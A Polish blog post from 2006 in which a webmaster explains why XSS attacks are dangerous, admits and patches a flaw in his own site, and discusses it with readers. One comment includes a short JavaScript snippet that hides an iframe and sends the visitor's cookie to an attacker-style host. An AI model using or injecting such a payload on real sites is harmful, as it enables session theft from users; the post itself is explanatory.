Home > JavaScript > Dlaczego ataki XSS są badzo groźne?

Dlaczego ataki XSS są badzo groźne?

Ataki XSS (Cross Site Scripting) polegają na zmuszeniu przeglądarki ofiary do wykonania programu JavaScript atakującego. Muszę przyznać, że mój kod też jest na to podatny. Dziś wklepałem łatkę do serwisu clubbing.czest.pl – który napisałem już wiele, wiele lat temu. Wiele, wiele lat temu nienawidziłem JavaScriptu. Chyba każdy webmaster ma w swoim życiu okres w którym nie pała miłością do tego języka. Moja nienawiść objawiała się w ten sposób, że ignorowałem istnienie JavaScriptu. Nie wyobrażałem sobie, że wstrzyknięcie na moją stronę kodu HTML może być niebezpieczne dla Internautów. Zawsze pamiętałem o bezpieczeństwie serwera, ale bezpieczeństwo przeglądarki WWW obchodziło mnie średnio. Dziś jestem fanem JavaScript’u. Ten poteżny język programowania daje wiele możliwości, w tym takich, które mogą być wykorzystane przez złego człowieka. Już wiem, że bezpieczeństow przeglądarki WWW jest tak samo ważne, jak bezpieczeństwo serwera. Dlaczego XSS jest taki groźny? Hmm, warto pomyśleć, ilu webmasterów myślało tak jak ja – ignorując nielubiany javascript zapominało o zagrożeniach dla Internauty. Błędy można podzielić na takie, które powstają poprzez nieuwagę programisty i poprzez jego niewiedzę. W przypadku mojego serwisu CCP przyczyną błędu była niewiedza. Zdawałem sobie sprawe, z możliwość wstrzyknięcia na moją stronę złośliwego kodu, ale nie zdawałem sobie sprawy z zagrożeń jakie to za sobą niesie. Błąd w CCP umożliwiał przejęcie skromnych danych osobowych gromadzonych w tym serwisie, a także publikowanie postów pod cudzym nikiem – podobnie jak w Allegro publikowania aukcji. Błąd poprawiłem dodając jedną linijkę kodu do mojej aplikacji (mam nadzieję że definitywnie). Wracając do tematu – XSS jest groźny bo przez długie lata był ignorowany. Każdy szanujący się programista wiedział – co to jest SQL Injection i przed tym się bronił. Natomiast programista (PHP, Java) pełniący obowiązki webmastera nie musiał wiedzieć co to jest XSS i (tak jak ja) mógł ten atak zignorować. Wiele firm uważa, że webmaster to taki “upośledzony” programista. Webmaster – to ktoś – kto nie jest wystarczająco dobry, żeby być programistą ale na tyle dobry, że poradzi sobie z HTML i CSS. Ataki XSS nauczą nas tego, żeby Webmasterów traktować na równi z programistami tworzącymi kod działający po stronie serwera. Ataków XSS będzie jeszcze wiele i dużo groźniejszych niż ten na Allegro. Pojawią się też wirusy, działające poprzez atak XSS. A co najfajniejsze, przed atakiami XSS Internaute nic nie chroni. Żaden firewall, antywirus, ani zapora systemowa. Przed atakami XSS Internaute chroni wyłącznie Webmaster.
Categories: JavaScript Tags:
  1. Anonymous
    December 20th, 2006 at 23:25 | #1

    Nic użytkownika nie chroni przed atakami XSS?

    Bzdura. Wystarczy wyłączyć JavaScript. Jakieś pytania? Dziękuję.

  2. Anonymous
    December 21st, 2006 at 23:04 | #2
  3. Antoni Jakubiak
    December 22nd, 2006 at 18:37 | #3

    Wyłączenie JavaScript chroni cie przed całym Web2.0, np.: Google Maps. To nie jest rozwiazanie. Wylaczenie komputera chroni jeszcze lepiej!

  4. Antoni Jakubiak
    December 22nd, 2006 at 18:40 | #4

    x.js to demonstacja tego co mozna zrobic.

    mozesz tez napisac.
    d = document.createElement(‘iframe’):
    d.style.display=’none’;
    document.appendChild(d);
    d.src = “http://logowanie.ciasteczek.gdzies.w.sieci/” + window.cookie;

    Jasne?

  5. Anonymous
    April 17th, 2007 at 18:52 | #5

    Świetny artukuł. Mógłbym prosic o link jak zabezpieczyc stronę przez tym atakiem?

    Pozdrawiam
    Linki

  6. Antoni Jakubiak
    April 17th, 2007 at 19:35 | #6

    Nie gromadzę linków do stron. Internet jest pełen informacji, na pewno coś znajdziesz pod hasłem XSS.
    Ale dam Ci radę. Nie można ufać sobie.

  1. No trackbacks yet.

Subscribe without commenting